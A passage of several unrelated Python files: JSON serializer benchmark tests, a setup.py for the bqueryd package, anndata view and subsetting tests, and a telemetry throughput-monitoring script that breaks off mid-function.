name, serialize, deserialize,
data=strings,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_booleans(name, serialize, deserialize, benchmark):
print("\nArray with 256 True's:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=booleans,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_list_of_dictionaries(name, serialize, deserialize, benchmark):
print("\nArray of 100 dictionaries:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=list_dicts,
iterations=5,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_dictionary_of_lists(name, serialize, deserialize, benchmark):
print("\nDictionary of 100 Arrays:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=dict_lists,
iterations=5,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_medium_complex_objects(name, serialize, deserialize, benchmark):
print("\n256 Medium Complex objects:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=medium_complex,
iterations=50000,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
def test_double_performance_float_precision(benchmark):
print("\nArray with 256 doubles:")
name = 'rapidjson (precise)'
serialize = rapidjson.dumps
deserialize = rapidjson.loads
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=doubles,
iterations=50000,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
|
from __future__ import absolute_import
import codecs
import os
from setuptools import setup, Extension, find_packages
from os.path import abspath
from sys import version_info as v
from setuptools.command.build_ext import build_ext as _build_ext
if any([v < (2, 6), (3,) < v < (3, 5)]):
raise Exception("Unsupported Python version %d.%d. Requires Python >= 2.7 "
"or >= 3.5." % v[:2])
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
# Prevent numpy from thinking it is still in its setup process:
__builtins__.__NUMPY_SETUP__ = False
import numpy
self.include_dirs.append(numpy.get_include())
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
"""
Build an absolute path from *parts* and and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
def get_version():
version = {}
with open("bqueryd/version.py") as fp:
exec (fp.read(), version)
return version
inc_dirs = [abspath('bqueryd')]
try:
import numpy as np
inc_dirs.append(np.get_include())
except ImportError as e:
pass
lib_dirs = []
libs = []
def_macros = []
sources = []
cmdclass = {'build_ext': build_ext}
optional_libs = ['numexpr>=2.6.9']
install_requires = [
'bquery>=0.2.10',
'pyzmq>=17.1.2',
'redis>=3.0.1',
'boto3>=1.9.82',
'smart_open>=1.9.0',
'netifaces>=0.10.9',
'configobj>=5.0.6',
'psutil>=5.0.0',
'azure-storage-blob==12.0.0',
]
setup_requires = []
tests_requires = [
'pandas>=0.23.1',
'pytest>=4.0.0',
'pytest-cov>=2.6.0',
'codacy-coverage>=1.3.7',
]
extras_requires = []
ext_modules = []
package_data = {}
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Operating System :: Microsoft :: Windows',
'Operating System :: Unix',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
setup(
name="bqueryd",
version=get_version()['__version__'],
description='A distribution framework for Bquery',
long_description=read("README.md"),
long_description_content_type='text/markdown',
classifiers=classifiers,
author='Carst Vaartjes',
author_email='cvaartjes@visualfabriq.com',
maintainer='Carst Vaartjes',
maintainer_email='cvaartjes@visualfabriq.com',
url='https://github.com/visualfabriq/bqueryd',
license='GPL2',
platforms=['any'],
ext_modules=ext_modules,
cmdclass=cmdclass,
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_requires,
extras_require=dict(
optional=extras_requires,
test=tests_requires
),
packages=find_packages(),
package_data=package_data,
include_package_data=True,
zip_safe=True,
entry_points={
'console_scripts': [
'bqueryd = bqueryd.node:main'
]
}
)
|
from copy import deepcopy
from operator import mul
import joblib
import numpy as np
from scipy import sparse
import pandas as pd
import pytest
import anndata as ad
from anndata._core.index import _normalize_index
from anndata._core.views import ArrayView, SparseCSRView, SparseCSCView
from anndata.utils import asarray
from anndata.tests.helpers import (
gen_adata,
subset_func,
slice_subset,
single_subset,
assert_equal,
)
X_list = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
obs_dict = dict(
row_names=["name1", "name2", "name3"], # row annotation
oanno1=["cat1", "cat2", "cat2"], # categorical annotation
oanno2=["o1", "o2", "o3"], # string annotation
oanno3=[2.1, 2.2, 2.3], # float annotation
)
var_dict = dict(vanno1=[3.1, 3.2, 3.3])
uns_dict = dict(oanno1_colors=["#000000", "#FFFFFF"], uns2=["some annotation"])
subset_func2 = subset_func
class NDArraySubclass(np.ndarray):
def view(self, dtype=None, typ=None):
return self
@pytest.fixture
def adata():
adata = ad.AnnData(np.zeros((100, 100)))
adata.obsm["o"] = np.zeros((100, 50))
adata.varm["o"] = np.zeros((100, 50))
return adata
@pytest.fixture(params=[asarray, sparse.csr_matrix, sparse.csc_matrix])
def adata_parameterized(request):
return gen_adata(shape=(200, 300), X_type=request.param)
@pytest.fixture(
params=[np.array, sparse.csr_matrix, sparse.csc_matrix],
ids=["np_array", "scipy_csr", "scipy_csc"],
)
def matrix_type(request):
return request.param
@pytest.fixture(params=["layers", "obsm", "varm"])
def mapping_name(request):
return request.param
def test_views():
X = np.array(X_list)
adata = ad.AnnData(X, obs=obs_dict, var=var_dict, uns=uns_dict, dtype="int32")
assert adata[:, 0].is_view
assert adata[:, 0].X.tolist() == np.reshape([1, 4, 7], (3, 1)).tolist()
adata[:2, 0].X = [0, 0]
assert adata[:, 0].X.tolist() == np.reshape([0, 0, 7], (3, 1)).tolist()
adata_subset = adata[:2, [0, 1]]
assert adata_subset.is_view
# now transition to actual object
adata_subset.obs["foo"] = range(2)
assert not adata_subset.is_view
assert adata_subset.obs["foo"].tolist() == list(range(2))
def test_modify_view_component(matrix_type, mapping_name):
adata = ad.AnnData(
np.zeros((10, 10)),
**{mapping_name: dict(m=matrix_type(asarray(sparse.random(10, 10))))},
)
init_hash = joblib.hash(adata)
subset = adata[:5, :][:, :5]
assert subset.is_view
m = getattr(subset, mapping_name)["m"]
m[0, 0] = 100
assert not subset.is_view
assert getattr(subset, mapping_name)["m"][0, 0] == 100
assert init_hash == joblib.hash(adata)
def test_set_obsm_key(adata):
init_hash = joblib.hash(adata)
orig_obsm_val = adata.obsm["o"].copy()
subset_obsm = adata[:50]
assert subset_obsm.is_view
subset_obsm.obsm["o"] = np.ones((50, 20))
assert not subset_obsm.is_view
assert np.all(adata.obsm["o"] == orig_obsm_val)
assert init_hash == joblib.hash(adata)
def test_set_varm_key(adata):
init_hash = joblib.hash(adata)
orig_varm_val = adata.varm["o"].copy()
subset_varm = adata[:, :50]
assert subset_varm.is_view
subset_varm.varm["o"] = np.ones((50, 20))
assert not subset_varm.is_view
assert np.all(adata.varm["o"] == orig_varm_val)
assert init_hash == joblib.hash(adata)
def test_set_obs(adata, subset_func):
init_hash = joblib.hash(adata)
subset = adata[subset_func(adata.obs_names), :]
new_obs = pd.DataFrame(
dict(a=np.ones(subset.n_obs), b=np.ones(subset.n_obs)),
index=subset.obs_names,
)
assert subset.is_view
subset.obs = new_obs
assert not subset.is_view
assert np.all(subset.obs == new_obs)
assert joblib.hash(adata) == init_hash
def test_set_var(adata, subset_func):
init_hash = joblib.hash(adata)
subset = adata[:, subset_func(adata.var_names)]
new_var = pd.DataFrame(
dict(a=np.ones(subset.n_vars), b=np.ones(subset.n_vars)),
index=subset.var_names,
)
assert subset.is_view
subset.var = new_var
assert not subset.is_view
assert np.all(subset.var == new_var)
assert joblib.hash(adata) == init_hash
def test_drop_obs_column():
adata = ad.AnnData(np.array(X_list), obs=obs_dict, dtype="int32")
subset = adata[:2]
assert subset.is_view
# returns a copy of obs
assert subset.obs.drop(columns=["oanno1"]).columns.tolist() == ["oanno2", "oanno3"]
assert subset.is_view
# would modify obs, so it should actualize subset and not modify adata
subset.obs.drop(columns=["oanno1"], inplace=True)
assert not subset.is_view
assert subset.obs.columns.tolist() == ["oanno2", "oanno3"]
assert adata.obs.columns.tolist() == ["oanno1", "oanno2", "oanno3"]
def test_set_obsm(adata):
init_hash = joblib.hash(adata)
dim0_size = np.random.randint(2, adata.shape[0] - 1)
dim1_size = np.random.randint(1, 99)
orig_obsm_val = adata.obsm["o"].copy()
subset_idx = np.random.choice(adata.obs_names, dim0_size, replace=False)
subset = adata[subset_idx, :]
assert subset.is_view
subset.obsm = dict(o=np.ones((dim0_size, dim1_size)))
assert not subset.is_view
assert np.all(orig_obsm_val == adata.obsm["o"]) # Checking for mutation
assert np.all(subset.obsm["o"] == np.ones((dim0_size, dim1_size)))
subset = adata[subset_idx, :]
subset_hash = joblib.hash(subset)
with pytest.raises(ValueError):
subset.obsm = dict(o=np.ones((dim0_size + 1, dim1_size)))
with pytest.raises(ValueError):
subset.varm = dict(o=np.ones((dim0_size - 1, dim1_size)))
assert subset_hash == joblib.hash(subset)
# Only modification have been made to a view
assert init_hash == joblib.hash(adata)
def test_set_varm(adata):
init_hash = joblib.hash(adata)
dim0_size = np.random.randint(2, adata.shape[1] - 1)
dim1_size = np.random.randint(1, 99)
orig_varm_val = adata.varm["o"].copy()
subset_idx = np.random.choice(adata.var_names, dim0_size, replace=False)
subset = adata[:, subset_idx]
assert subset.is_view
subset.varm = dict(o=np.ones((dim0_size, dim1_size)))
assert not subset.is_view
assert np.all(orig_varm_val == adata.varm["o"]) # Checking for mutation
assert np.all(subset.varm["o"] == np.ones((dim0_size, dim1_size)))
subset = adata[:, subset_idx]
subset_hash = joblib.hash(subset)
with pytest.raises(ValueError):
subset.varm = dict(o=np.ones((dim0_size + 1, dim1_size)))
with pytest.raises(ValueError):
subset.varm = dict(o=np.ones((dim0_size - 1, dim1_size)))
# subset should not be changed by failed setting
assert subset_hash == joblib.hash(subset)
assert init_hash == joblib.hash(adata)
def test_not_set_subset_X(matrix_type, subset_func):
adata = ad.AnnData(matrix_type(asarray(sparse.random(20, 20))))
init_hash = joblib.hash(adata)
orig_X_val = adata.X.copy()
while True:
subset_idx = slice_subset(adata.obs_names)
if len(adata[subset_idx, :]) > 2:
break
subset = adata[subset_idx, :]
subset = adata[:, subset_idx]
internal_idx = _normalize_index(
subset_func(np.arange(subset.X.shape[1])), subset.var_names
)
assert subset.is_view
subset.X[:, internal_idx] = 1
assert not subset.is_view
assert not np.any(asarray(adata.X != orig_X_val))
assert init_hash == joblib.hash(adata)
def test_set_scalar_subset_X(matrix_type, subset_func):
adata = ad.AnnData(matrix_type(np.zeros((10, 10))))
orig_X_val = adata.X.copy()
subset_idx = slice_subset(adata.obs_names)
adata_subset = adata[subset_idx, :]
adata_subset.X = 1
assert adata_subset.is_view
assert np.all(asarray(adata[subset_idx, :].X) == 1)
assert asarray((orig_X_val != adata.X)).sum() == mul(*adata_subset.shape)
def test_set_subset_obsm(adata, subset_func):
init_hash = joblib.hash(adata)
orig_obsm_val = adata.obsm["o"].copy()
while True:
subset_idx = slice_subset(adata.obs_names)
if len(adata[subset_idx, :]) > 2:
break
subset = adata[subset_idx, :]
internal_idx = _normalize_index(
subset_func(np.arange(subset.obsm["o"].shape[0])), subset.obs_names
)
assert subset.is_view
subset.obsm["o"][internal_idx] = 1
assert not subset.is_view
assert np.all(adata.obsm["o"] == orig_obsm_val)
assert init_hash == joblib.hash(adata)
def test_set_subset_varm(adata, subset_func):
init_hash = joblib.hash(adata)
orig_varm_val = adata.varm["o"].copy()
while True:
subset_idx = slice_subset(adata.var_names)
if (adata[:, subset_idx]).shape[1] > 2:
break
subset = adata[:, subset_idx]
internal_idx = _normalize_index(
subset_func(np.arange(subset.varm["o"].shape[0])), subset.var_names
)
assert subset.is_view
subset.varm["o"][internal_idx] = 1
assert not subset.is_view
assert np.all(adata.varm["o"] == orig_varm_val)
assert init_hash == joblib.hash(adata)
@pytest.mark.parametrize("attr", ["obsm", "varm", "obsp", "varp", "layers"])
def test_view_failed_delitem(attr):
adata = gen_adata((10, 10))
view = adata[5:7, :][:, :5]
adata_hash = joblib.hash(adata)
view_hash = joblib.hash(view)
with pytest.raises(KeyError):
getattr(view, attr).__delitem__("not a key")
assert view.is_view
assert adata_hash == joblib.hash(adata)
assert view_hash == joblib.hash(view)
@pytest.mark.parametrize("attr", ["obsm", "varm", "obsp", "varp", "layers"])
def test_view_delitem(attr):
adata = gen_adata((10, 10))
getattr(adata, attr)["to_delete"] = np.ones((10, 10))
# Shouldn’t be a subclass, should be an ndarray
assert type(getattr(adata, attr)["to_delete"]) is np.ndarray
view = adata[5:7, :][:, :5]
adata_hash = joblib.hash(adata)
view_hash = joblib.hash(view)
getattr(view, attr).__delitem__("to_delete")
assert not view.is_view
assert "to_delete" not in getattr(view, attr)
assert "to_delete" in getattr(adata, attr)
assert adata_hash == joblib.hash(adata)
assert view_hash != joblib.hash(view)
@pytest.mark.parametrize(
"attr", ["X", "obs", "var", "obsm", "varm", "obsp", "varp", "layers", "uns"]
)
def test_view_delattr(attr, subset_func):
base = gen_adata((10, 10))
orig_hash = joblib.hash(base)
subset = base[subset_func(base.obs_names), subset_func(base.var_names)]
empty = ad.AnnData(obs=subset.obs[[]], var=subset.var[[]])
delattr(subset, attr)
assert not subset.is_view
# Should now have same value as default
assert_equal(getattr(subset, attr), getattr(empty, attr))
assert orig_hash == joblib.hash(base) # Original should not be modified
@pytest.mark.parametrize(
"attr", ["obs", "var", "obsm", "varm", "obsp", "varp", "layers", "uns"]
)
def test_view_setattr_machinery(attr, subset_func, subset_func2):
# Tests that setting attributes on a view doesn't mess anything up too bad
adata = gen_adata((10, 10))
view = adata[subset_func(adata.obs_names), subset_func2(adata.var_names)]
actual = view.copy()
setattr(view, attr, getattr(actual, attr))
assert_equal(actual, view, exact=True)
def test_layers_view():
X = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
L = np.array([[10, 11, 12], [13, 14, 15], [16, 17, 18]])
real_adata = ad.AnnData(X)
real_adata.layers["L"] = L
view_adata = real_adata[1:, 1:]
real_hash = joblib.hash(real_adata)
view_hash = joblib.hash(view_adata)
assert view_adata.is_view
with pytest.raises(ValueError):
view_adata.layers["L2"] = L + 2
assert view_adata.is_view # Failing to set layer item makes adata not view
assert real_hash == joblib.hash(real_adata)
assert view_hash == joblib.hash(view_adata)
view_adata.layers["L2"] = L[1:, 1:] + 2
assert not view_adata.is_view
assert real_hash == joblib.hash(real_adata)
assert view_hash != joblib.hash(view_adata)
def test_view_of_view(matrix_type, subset_func, subset_func2):
adata = gen_adata((30, 15), X_type=matrix_type)
adata.raw = adata
if subset_func is single_subset:
pytest.xfail("Other subset generating functions have trouble with this")
var_s1 = subset_func(adata.var_names, min_size=4)
var_view1 = adata[:, var_s1]
var_s2 = subset_func2(var_view1.var_names)
var_view2 = var_view1[:, var_s2]
assert var_view2._adata_ref is adata
obs_s1 = subset_func(adata.obs_names, min_size=4)
obs_view1 = adata[obs_s1, :]
obs_s2 = subset_func2(obs_view1.obs_names)
assert adata[obs_s1, :][:, var_s1][obs_s2, :]._adata_ref is adata
view_of_actual_copy = adata[:, var_s1].copy()[obs_s1, :].copy()[:, var_s2].copy()
view_of_view_copy = adata[:, var_s1][obs_s1, :][:, var_s2].copy()
assert_equal(view_of_actual_copy, view_of_view_copy, exact=True)
def test_view_of_view_modification():
adata = ad.AnnData(np.zeros((10, 10)))
adata[0, :][:, 5:].X = np.ones(5)
assert np.all(adata.X[0, 5:] == np.ones(5))
adata[[1, 2], :][:, [1, 2]].X = np.ones((2, 2))
assert np.all(adata.X[1:3, 1:3] == np.ones((2, 2)))
adata.X = sparse.csr_matrix(adata.X)
adata[0, :][:, 5:].X = np.ones(5) * 2
assert np.all(asarray(adata.X)[0, 5:] == np.ones(5) * 2)
adata[[1, 2], :][:, [1, 2]].X = np.ones((2, 2)) * 2
assert np.all(asarray(adata.X)[1:3, 1:3] == np.ones((2, 2)) * 2)
def test_double_index(subset_func, subset_func2):
adata = gen_adata((10, 10))
obs_subset = subset_func(adata.obs_names)
var_subset = subset_func2(adata.var_names)
v1 = adata[obs_subset, var_subset]
v2 = adata[obs_subset, :][:, var_subset]
assert np.all(asarray(v1.X) == asarray(v2.X))
assert np.all(v1.obs == v2.obs)
assert np.all(v1.var == v2.var)
def test_view_retains_ndarray_subclass():
adata = ad.AnnData(np.zeros((10, 10)))
adata.obsm["foo"] = np.zeros((10, 5)).view(NDArraySubclass)
view = adata[:5, :]
assert isinstance(view.obsm["foo"], NDArraySubclass)
assert view.obsm["foo"].shape == (5, 5)
def test_modify_uns_in_copy():
# https://github.com/theislab/anndata/issues/571
adata = ad.AnnData(np.ones((5, 5)), uns={"parent": {"key": "value"}})
adata_copy = adata[:3].copy()
adata_copy.uns["parent"]["key"] = "new_value"
assert adata.uns["parent"]["key"] != adata_copy.uns["parent"]["key"]
@pytest.mark.parametrize("index", [-101, 100, (slice(None), -101), (slice(None), 100)])
def test_invalid_scalar_index(adata, index):
# https://github.com/theislab/anndata/issues/619
with pytest.raises(IndexError, match=r".*index.* out of range\."):
_ = adata[index]
@pytest.mark.parametrize("obs", [False, True])
@pytest.mark.parametrize("index", [-100, -50, -1])
def test_negative_scalar_index(adata, index: int, obs: bool):
pos_index = index + (adata.n_obs if obs else adata.n_vars)
if obs:
adata_pos_subset = adata[pos_index]
adata_neg_subset = adata[index]
else:
adata_pos_subset = adata[:, pos_index]
adata_neg_subset = adata[:, index]
np.testing.assert_array_equal(
adata_pos_subset.obs_names, adata_neg_subset.obs_names
)
np.testing.assert_array_equal(
adata_pos_subset.var_names, adata_neg_subset.var_names
)
@pytest.mark.parametrize("spmat", [sparse.csr_matrix, sparse.csc_matrix])
def test_deepcopy_subset(adata, spmat: type):
adata.obsp["arr"] = np.zeros((adata.n_obs, adata.n_obs))
adata.obsp["spmat"] = spmat((adata.n_obs, adata.n_obs))
adata = deepcopy(adata[:10].copy())
assert isinstance(adata.obsp["arr"], np.ndarray)
assert not isinstance(adata.obsp["arr"], ArrayView)
np.testing.assert_array_equal(adata.obsp["arr"].shape, (10, 10))
assert isinstance(adata.obsp["spmat"], spmat)
assert not isinstance(
adata.obsp["spmat"],
SparseCSRView if spmat is sparse.csr_matrix else SparseCSCView,
)
np.testing.assert_array_equal(adata.obsp["spmat"].shape, (10, 10))
@pytest.mark.parametrize("array_type", [asarray, sparse.csr_matrix, sparse.csc_matrix])
@pytest.mark.parametrize("attr", ["X", "layers", "obsm", "varm", "obsp", "varp"])
def test_view_mixin_copies_data(adata, array_type: type, attr):
N = 100
adata = ad.AnnData(
obs=pd.DataFrame(index=np.arange(N)), var=pd.DataFrame(index=np.arange(N))
)
X = array_type(sparse.eye(N, N).multiply(np.arange(1, N + 1)))
if attr == "X":
adata.X = X
else:
getattr(adata, attr)["arr"] = X
view = adata[:50]
if attr == "X":
arr_view = view.X
else:
arr_view = getattr(view, attr)["arr"]
arr_view_copy = arr_view.copy()
if sparse.issparse(X):
assert not np.shares_memory(arr_view.indices, arr_view_copy.indices)
assert not np.shares_memory(arr_view.indptr, arr_view_copy.indptr)
assert not np.shares_memory(arr_view.data, arr_view_copy.data)
arr_view_copy.data[0] = -5
assert not np.array_equal(arr_view_copy.data, arr_view.data)
else:
assert not np.shares_memory(arr_view, arr_view_copy)
arr_view_copy[0, 0] = -5
assert not np.array_equal(arr_view_copy, arr_view)
def test_copy_X_dtype():
adata = ad.AnnData(sparse.eye(50, dtype=np.float64, format="csr"))
adata_c = adata[::2].copy()
assert adata_c.X.dtype == adata.X.dtype
|
'''use marquise_telemetry to build throughput info as visible from the client
e.g.:
$ marquse_telemetry broker | marquise_throughput.py
'''
import sys
from time import *
import os
import fcntl
class TimeAware(object):
'''simple timing aware mixin
The default implementation of on_tick_change() is to call every function
passed to the constructor in tick_handlers
'''
def __init__(self, ticklen=1, tick_handlers=[]):
self.last_tick = self.start_time = time()
self.ticklen = ticklen
self.tick_handlers = tick_handlers
self.n_ticks = 0
self.totalticktime = 0
def check_for_tick_changed(self):
'''run on_tick_change once for every ticklen seconds that has passed since last_tick
'''
tnow = time()
while tnow - self.last_tick >= self.ticklen:
self.n_ticks += 1
self.totalticktime += self.ticklen
self.last_tick += self.ticklen
self.on_tick_change()
def on_tick_change(self):
'''handler for a tick change
the timestamp marking the 'tick' being handled is in self.last_tick
The current time may however be significantly after self.last_tick if
check_for_tick_changed is not called more often than self.ticklen
'''
for f in self.tick_handlers: f()
def run_forever(self,sleep_time=None):
'''run in a loop regularly calling on_tick_change
'''
if sleep_time == None: sleep_time = self.ticklen/10.0
while True:
self.check_for_tick_changed()
sleep(sleep_time)
class TimeHistogram(TimeAware):
'''implements a rolling histogram'''
def __init__(self, nbins, seconds_per_bin=1):
TimeAware.__init__(self, seconds_per_bin)
self.nbins = nbins
self._bins = [0 for n in range(nbins)]
self.current_bin = 0
def on_tick_change(self):
self.current_bin = (self.current_bin + 1) % self.nbins
self._bins[self.current_bin] = 0
def add(self, n=1):
'''add 'n' to the current histogram bin
'''
self.check_for_tick_changed()
self._bins[self.current_bin] += n
def sum(self, k=60):
'''return the total entries per second over the last k seconds
'''
bins_to_check = k/self.ticklen
return sum(self.bins[-bins_to_check:])
def mean(self, k=60):
'''return the mean entries per second over the last k seconds
'''
if self.totalticktime < k:
k = self.totalticktime # Only average over the time we've been running
bins_to_check = k/self.ticklen
return self.sum(k) / float(bins_to_check) if bins_to_check else 0
@property
def bins(self):
'''get bins in time order, oldest to newest'''
self.check_for_tick_changed()
return self._bins[self.current_bin+1:]+self._bins[:self.current_bin+1]
class ThroughputCounter(object):
def __init__(self, input_stream=sys.stdin):
self.input_stream=input_stream
self.point_hist = TimeHistogram(600)
self.burst_hist = TimeHistogram(600)
self.acked_burst_hist = TimeHistogram(600)
self.latency_hist = TimeHistogram(600)
self.ack_hist = TimeHistogram(600)
self.defer_write_points_hist = TimeHistogram(600)
self.defer_read_points_hist = TimeHistogram(600)
self.timed_out_points_hist = TimeHistogram(600)
self.outstanding_points = 0
self.outstanding_bursts = {} # burstid -> start timestamp,points
self._reader_state = {}
self.using_marquised = set() # Hosts that relay through marquised
def get_outstanding(self,last_n_seconds=[600,60,1]):
total_burst_counts = map(self.point_hist.sum, last_n_seconds)
total_ack_counts = map(self.ack_hist.sum, last_n_seconds)
return [nbursts-nacks for nbursts,nacks in zip(total_burst_counts,total_ack_counts)]
def get_total_outstanding_points(self):
return sum(points for timestamp,points in self.outstanding_bursts.itervalues())
def get_points_per_seconds(self,over_seconds=[600,60,1]):
return map(self.point_hist.mean, over_seconds)
def get_total_bursts(self,over_seconds=[600,60,1]):
return map(self.burst_hist.mean, over_seconds)
def get_acks_per_second(self,over_seconds=[600,60,1]):
return map(self.ack_hist.mean, over_seconds)
def get_deferred_points_written_per_second(self,over_seconds=[600,60,1]):
return map(self.defer_write_points_hist.mean, over_seconds)
def get_timed_out_points_per_second(self,over_seconds=[600,60,1]):
return map(self.timed_out_points_hist.mean, over_seconds)
def get_deferred_points_read_per_second(self,over_seconds=[600,60,1]):
return map(self.defer_read_points_hist.mean, over_seconds)
def get_average_latencies(self,over_seconds=[600,60,1]):
burst_counts = map(self.acked_burst_hist.sum, over_seconds)
latency_sums = map(self.latency_hist.sum, over_seconds)
return [latencysum/float(nbursts) if nbursts > 0 else 0 for latencysum,nbursts in zip(latency_sums,burst_counts)]
def process_burst(self, data):
if not all(k in data for k in ('identity','message id','points')):
print >> sys.stderr, 'malformed databurst info. ignoring'
return
msgtag = data['identity']+data['message id']
points = int(data['points'])
timestamp = time()
self.outstanding_bursts[msgtag] = timestamp,points
self.outstanding_points += points
self.burst_hist.add(1)
self.point_hist.add(points)
def _msg_tag_from_data(self, data):
return (data['identity'].replace('marquised:',''))+data['message id']
def process_deferred_write(self, data):
msgtag = self._msg_tag_from_data(data)
burst_timestamp,points = self.outstanding_bursts.get(msgtag,(None,None))
if burst_timestamp is not None:
self.defer_write_points_hist.add(points)
def process_deferred_read(self, data):
msgtag = self._msg_tag_from_data(data)
burst_timestamp,points = self.outstanding_bursts.get(msgtag,(None,None))
if burst_timestamp is not None:
self.defer_read_points_hist.add(points)
def process_send_timeout(self, data):
msgtag = self._msg_tag_from_data(data)
burst_timestamp,points = self.outstanding_bursts.get(msgtag,(None,None))
if burst_timestamp is not None:
self.timed_out_points_hist.add(points)
def process_ack(self, data):
if not all(k in data for k in ('identity','message id')):
print >> sys.stderr, 'malformed ack info. ignoring'
return
if data['identity'][:10] == 'marquised:':
# ACK is coming back to marquised from the broker
host = data['identity'][10:]
self.using_marquised.add(host)
else:
host = data['identity']
if host in self.using_marquised:
# If a client is using marquised, that client will
# recieve an ack back from marquised immediately.
#
# We ignore this ack here, and wait for the one
# received by marquised
return
msgtag = host+data['message id']
burst_timestamp,points = self.outstanding_bursts.pop(msgtag,(None,None))
if burst_timestamp == None:
# Got an ACK we didn't see the burst for. Ignoring it.
return
latency = time() - burst_timestamp
self.ack_hist.add(points)
self.acked_burst_hist.add(1)
self.latency_hist.add(latency)
self.outstanding_points -= points
def process_line(self, line):
'''process a line of marquise telemetry
At the moment, only look at bursts being created by the collate_thread
and acked by the marquise poller_thread
sample:
fishhook.engineroom.anchor.net.au 1395212041732118000 8c087c0b collator_thread created_databurst frames = 1618 compressed_bytes = 16921
....
marquised:astrolabe.syd1.anchor.net.au 1395375377705126042 c87ba112 poller_thread rx_msg_from collate_thread
....
fishhook.engineroom.anchor.net.au 1395212082492520000 8c087c0b poller_thread rx_ack_from broker msg_id = 5553
CAVEAT: In the above, the marquised 'collate_thread' is actually the
collate thread in a different process, received by marquised. We can
use the knowledge that this is happening to note that astrolabe is
passing stuff through marquised, and to ignore the ACK that marquised
sends back to the original client on astrolabe when tracking end-to-end
latency
'''
fields = line.strip().split()
if len(fields) < 4: return
# Keep track of hosts using marquised. This is a bit bruteforce, but we need to catch this
# sort of thing early to not accidentally double-track ACKs
#
if fields[0][:10] == 'marquised:':
self.using_marquised.add(fields[0][10:])
key = ' '.join(fields[3:6])
if key == 'collator_thread created_databurst frames':
identity,message_id,points = fields[0],fields[2],int(fields[7])
self.process_burst({ 'identity': identity, 'message id': message_id, 'points': points })
# Anything past here is only in the poller thread. Skips a lot of stuff
if fields[3] != 'poller_thread': return
if key == 'poller_thread rx_ack_from broker':
identity,message_id = fields[0],fields[2]
self.process_ack({ 'identity': identity, 'message id': message_id })
elif fields[4] == 'defer_to_disk':
identity,message_id = fields[0],fields[2]
data = { 'identity': identity, 'message id': message_id }
self.process_deferred_write({ 'identity': identity, 'message id': message_id })
if fields[5] == 'timeout_waiting_for_ack':
self.process_send_timeout({ 'identity': identity, 'message id': message_id })
elif fields[4] == 'read_from_disk':
identity,message_id = fields[0],fields[2]
self.process_deferred_read({ 'identity': identity, 'message id': message_id })
def process_lines_from_stream(self):
'''process any lines from our streams that are available to read'''
while True:
try:
l = self.input_stream.readline()
self.process_line(l)
except IOError:
# Nothing left to read at the moment
return
class ThroughputPrinter(object):
def __init__(self, counter, outstream=sys.stdout, avgtimes=(600,60,1)):
self.counter = counter
self.outstream = outstream
self.avgtimes = avgtimes
self.lines_printed = 0
def print_header(self):
colbreak = " " * 3
header = '#'
header += "mean points per second".center(29) + colbreak
header += "mean acks per second".center(30) + colbreak
header += "mean latency per point".center(30) + colbreak
header += "deferred points written/s".center(30) + colbreak
header += "deferred points read/s".center(30) + colbreak
header += "points timed out sending/s".center(30) + colbreak
header += "unacked".rjust(10) + '\n'
header += "#"
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)[1:]
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak + "points".rjust(10) + '\n'
header += '# ' + '-'*28 + colbreak + '-'*30 + colbreak + '-'*30
header += colbreak + '-'*30 + colbreak + '-'*30 + colbreak + '-'*30
header += colbreak + '-'*10 + '\n'
self.outstream.write(header)
self.outstream.flush()
def print_throughput(self):
bursts_per_second = self.counter.get_points_per_seconds(self.avgtimes)
acks_per_second = self.counter.get_acks_per_second(self.avgtimes)
mean_latencies = self.counter.get_average_latencies(self.avgtimes)
outstanding_points = self.counter.get_total_outstanding_points()
points_deferred_to_disk = self.counter.get_deferred_points_written_per_second(self.avgtimes)
points_read_from_disk = self.counter.get_deferred_points_read_per_second(self.avgtimes)
points_timed_out_sending = self.counter.get_timed_out_points_per_second(self.avgtimes)
